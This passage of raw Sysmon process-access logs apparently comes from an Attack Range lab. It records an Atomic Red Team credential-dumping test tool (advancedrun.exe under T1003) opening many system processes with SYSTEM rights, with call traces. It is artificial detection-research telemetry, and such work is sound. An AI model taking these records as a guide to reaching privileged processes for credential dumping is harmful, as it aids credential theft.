cRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
